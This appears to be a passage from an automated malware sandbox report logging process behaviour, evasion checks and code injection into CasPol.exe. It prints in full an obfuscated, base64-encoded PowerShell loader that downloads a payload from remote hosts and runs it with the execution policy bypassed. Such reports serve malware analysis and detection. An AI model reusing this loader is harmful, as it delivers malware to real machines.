                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Delayed program exit found
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040E54F Sleep,ExitProcess,12_2_0040E54F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,18_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,12_2_004198C2
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5643Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3983Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5879Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3882Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1354Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 576Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4259Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5515Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9752
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_12-69285
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_12-69547
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI coverage: 9.6 %
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7896Thread sleep time: -20291418481080494s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7832Thread sleep count: 5879 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7820Thread sleep count: 3882 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7868Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8172Thread sleep count: 1354 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8176Thread sleep count: 576 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8188Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7344Thread sleep count: 4259 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7344Thread sleep count: 5515 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1152Thread sleep time: -21213755684765971s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2300Thread sleep count: 143 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2300Thread sleep time: -429000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 3436Thread sleep count: 40 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2300Thread sleep count: 9752 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2300Thread sleep time: -29256000s >= -30000s
                    Source: C:\Windows\System32\svchost.exe TID: 7816Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040B335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,12_2_0041B42F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040B53A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044D5E9 FindFirstFileExA,12_2_0044D5E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,12_2_004089A9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406AC2 FindFirstFileW,FindNextFileW,12_2_00406AC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,12_2_00407A8C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00418C69
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,12_2_00408DA7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_045710F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,12_2_045710F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_04576580 FindFirstFileExA,12_2_04576580
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_10005C00 FindFirstFileW,FindNextFileW,FindNextFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,12_2_10005C00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_10007E20 Sleep,FindFirstFileW,RemoveDirectoryW,FindNextFileW,RemoveDirectoryW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_10007E20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_100073F0 FindFirstFileW,FindNextFileW,CreateFileW,FindNextFileW,FindClose,CloseHandle,FindClose,12_2_100073F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_10018AD0 FindFirstFileExA,12_2_10018AD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0040AE51 FindFirstFileW,FindNextFileW,18_2_0040AE51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,19_2_00407EF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,24_2_00407898
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00406F06
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00418981 memset,GetSystemInfo,18_2_00418981
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: powershell.exe, 00000003.00000002.1476840604.0000000004EA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                    Source: wscript.exe, 00000007.00000002.1562874159.0000000004AB5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: powershell.exe, 00000003.00000002.1476840604.0000000004EA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                    Source: powershell.exe, 00000003.00000002.1475637134.0000000002DA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .0 $tVmNetworkAdPSDscXMachine.psm1l
                    Source: powershell.exe, 00000001.00000002.1600493692.0000000007707000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1604114869.0000000008622000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1600493692.00000000076B4000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.3861630082.0000000000F62000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.3863782930.0000000000FCA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: mshta.exe, 00000000.00000003.1432152369.0000000005B58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\f.L
                    Source: powershell.exe, 00000003.00000002.1475637134.0000000002DA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PEventVmNetwoPSDesiredStateConfiguration.types.ps1xml
                    Source: powershell.exe, 00000003.00000002.1476840604.0000000004EA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                    Source: powershell.exe, 0000000A.00000002.1921166368.000000000750A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrQ
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0043A65D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,18_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BCE3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00442554 mov eax, dword ptr fs:[00000030h]12_2_00442554
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_04574AB4 mov eax, dword ptr fs:[00000030h]12_2_04574AB4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_10014BBC mov eax, dword ptr fs:[00000030h]12_2_10014BBC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00410B19 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,SetLastError,SetLastError,12_2_00410B19
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00434168
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0043A65D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00433B44
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00433CD7 SetUnhandledExceptionFilter,12_2_00433CD7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_04572639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_04572639
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_045760E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_045760E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_04572B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_04572B1C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_1000B299 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_1000B299
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_1000D8D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_1000D8D1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_1000AFD4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_1000AFD4

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Yara detected Powershell decode and execute
                    Source: Yara matchFile source: amsi32_752.amsi.csv, type: OTHER
                    Yara detected Powershell download and execute
                    Source: Yara matchFile source: amsi32_752.amsi.csv, type: OTHER
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 752, type: MEMORYSTR
                    Bypasses PowerShell execution policy
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzSE5pbWFnZVVybCA9IGI0Rmh0dHBzOi8vMTAxJysnNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1JysndyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNycrJzZhMDkwNGYgYjRGO3NITndlYkNsJysnaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cycrJ0hOaW1hZ2VCeXRlcyA9IHNITndlYkNsaWVudC5Eb3dubG8nKydhZERhdGEoc0hOaW1hZ2VVcmwpO3NITmltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHNITmltJysnYWdlQnl0ZXMpO3NITnN0YXJ0RmxhZyA9IGI0Rjw8QkFTRTY0X1NUQVJUPj5iNEY7c0hOZW5kRmxhZyA9ICcrJ2I0Rjw8QkFTRTY0X0VORD4+YjRGO3NITnN0YXJ0SW5kZXggPSBzSCcrJ05pbWFnZVRlJysneHQuSW5kZXhPZihzSE5zdGFydEZsYWcpO3NITmVuZEluZCcrJ2V4ID0gc0hOaW1hZ2VUZXh0LkluZGV4T2Yoc0hOZW5kRmxhZyk7c0hOc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNITmVuZEluZGV4IC1ndCBzSE5zdGFydCcrJ0luZGV4O3NITnN0JysnYXJ0SW5kZXggKz0gc0hOc3RhcnRGbGFnJysnLkxlbmd0aDtzSE5iYXNlJysnNjRMZW5ndGggPSBzSE5lbmRJbmRleCAtIHNITnN0YXJ0SW5kZXg7c0hOYmFzZTY0Q29tbWFuZCA9IHNITicrJ2knKydtYWdlVGV4dC5TdWJzdHJpbmcoc0hOc3RhcnRJbmRleCwgc0hOYmFzZTY0TGVuZ3RoKTtzSE5iYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzSE5iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgczdnIEZvckVhY2gtT2JqZWN0IHsgc0hOXyB9KVstMS4uLShzSE5iYXNlNjRDb21tYW5kLkxlbmd0aCldO3NITmNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTJysndHJpbmcoc0hOYmEnKydzZTY0UmV2ZXJzZWQpO3NITmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCcrJyhzSE5jb21tYW5kQnl0ZXMpO3NITnZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoYjRGVkFJYjRGKTtzSE52YWlNZXRob2QuSW52bycrJ2tlKHNITm51bGwsIEAoYjRGdHh0LkVEU1NSRi85MjMvODMxLjE3MS40OS4zMi8vOnB0dGhiNEYsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RmRlc2F0aXZhZG9iNCcrJ0YsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RkNhc1BvbCcrJ2I0RiwgYjRGZGVzYXRpdmFkb2I0RiwgYjRGZGVzYXRpdmFkb2InKyc0RixiNEZkZXNhdGl2YWQnKydvYjRGLGI0RmRlc2F0aXZhZG9iNEYsYjRGZGVzYXRpdmFkb2I0RixiNEZkZXNhdGl2YWRvYjRGLGI0RmRlc2F0aXZhZG9iJysnNEYsYjRGMWI0RixiNEZkZXNhdGl2YWRvYjRGKSk7JykuUkVwbGFDZSgnYjRGJyxbc1RySW5nXVtDSGFyXTM5KS5SRXBsYUNlKCdzSE4nLCckJykuUkVwbGFDZSgnczdnJywnfCcpIHwmICggJFBzaG9tZVs0XSskUFNIT21FWzMwXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Contains functionality to inject code into remote processes
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00417245 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,12_2_00417245
                    Injects a PE file into a foreign processes
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000Jump to behavior
